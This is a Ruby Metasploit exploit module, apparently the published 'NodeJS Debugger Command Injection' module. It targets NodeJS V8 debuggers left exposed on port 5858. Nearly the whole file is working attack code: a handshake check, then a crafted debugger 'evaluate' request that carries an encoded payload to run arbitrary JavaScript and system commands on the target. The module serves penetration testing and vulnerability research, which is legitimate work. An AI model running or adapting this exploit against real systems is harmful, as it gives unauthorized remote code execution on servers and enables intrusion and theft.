MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n"
def initialize(info={})
super(update_info(info,
'Name' => "NodeJS Debugger Command Injection",
'Description' => %q{
This module uses the "evaluate" request type of the NodeJS V8
debugger protocol (version 1) to evaluate arbitrary JS and
call out to other system commands. The port (default 5858) is
not exposed non-locally in default configurations, but may be
exposed either intentionally or via misconfiguration.
},
'License' => MSF_LICENSE,
'Author' => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
'References' =>
[
[ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
[ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
],
'Targets' =>
[
['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
],
'Privileged' => false,
'DisclosureDate' => "Aug 15 2016",
'DefaultTarget' => 0)
)
register_options(
[
Opt::RPORT(5858)
])
end
def make_eval_message
msg_body = { seq: 1,
type: 'request',
command: 'evaluate',
arguments: { expression: payload.encoded,
global: true,
maxStringLength:-1
}
}.to_json
msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
msg_header + msg_body
end
def check
connect
res = sock.get_once
disconnect
if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
vprint_status("Got debugger handshake:\n#{res}")
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Unknown
end
def exploit
connect
# must consume incoming handshake before sending payload
buf = sock.get_once
msg = make_eval_message
print_status("Sending #{msg.length} byte payload...")
vprint_status("#{msg}")
sock.put(msg)
buf = sock.get_once
if buf.include? '"command":"evaluate","success":true'
print_status("Got success response")
elsif buf.include? '"command":"evaluate","success":false'
print_error("Got failure response: #{buf}")
else
print_error("Got unexpected response: #{buf}")
end
end
end